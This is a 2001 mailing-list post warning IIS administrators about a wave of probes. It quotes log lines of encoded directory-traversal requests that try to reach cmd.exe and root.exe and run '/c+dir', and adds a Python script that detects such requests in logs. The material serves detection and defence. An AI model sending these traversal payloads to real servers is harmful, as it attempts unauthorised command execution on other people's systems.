From: John Howie (JHowieMSN.COM)
Date: Tue Sep 18 2001 - 13:33:22 CDT


    Folks,

    I have started seeing the following in my IIS logs, starting earlier today.
    I am getting hit constantly from various sources. I advise you to check your
    IIS boxes to see if you, or any of the servers you know, have been
    compromised.

    john...

    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
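
A way to run the check the post recommends, as an added example that is not part of the original message: it scans log lines in the layout shown above for requests ending in cmd.exe or root.exe, for traversal sequences once percent-encoding is undone, and for non-ASCII bytes in the path, then groups the hits by client and lists any that were answered with 200. It goes slightly beyond the lines in the post by also undoing double percent-encoding; the sample log, the client addresses and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the post's field layout; client IPs are placeholders.
SAMPLE_LOG = """\
2001-09-18 13:21:25 203.0.113.7 - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:27 203.0.113.7 - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 203.0.113.7 - 192.168.1.251 80 GET /scripts/..\u00c1 ../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:22:02 198.51.100.9 - 192.168.1.251 80 GET /default.htm - 200 -
2001-09-18 13:22:40 198.51.100.23 - 192.168.1.251 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200 -
"""

# date time client user server port method stem query status trailer;
# the stem is matched greedily because logged stems can contain spaces.
LINE = re.compile(r"^\S+ \S+ (\S+) \S+ \S+ \d+ \S+ (.+) \S+ (\d{3}) \S+\s*$")
SHELL = re.compile(r"/(?:cmd|root)\.exe$", re.IGNORECASE)

def decode_fully(stem, rounds=3):
    """Percent-decode repeatedly so double-encoded separators become visible."""
    for _ in range(rounds):
        stem = unquote(stem, encoding="latin-1")
    return stem

def classify(stem):
    """Return the reasons a URI stem resembles the requests in the post."""
    path = decode_fully(stem).replace("\\", "/")
    reasons = []
    if SHELL.search(path):
        reasons.append("shell-binary")
    if ".." in path.split("/"):
        reasons.append("traversal")
    if any(ord(ch) > 126 for ch in path):
        reasons.append("non-ascii")
    return reasons

def summarize(log_text):
    """Per client: number of probes and any probe answered with 200."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and classify(m.group(2)):
            client, stem, status = m.groups()
            report[client]["probes"] += 1
            if status == "200":
                report[client]["served"].append(stem)
    return dict(report)

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

A client with entries under `served` got a 200 for one of these requests, so that server is the one to examine first; 404 and 500 responses like those in the post only show that the probe was attempted.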
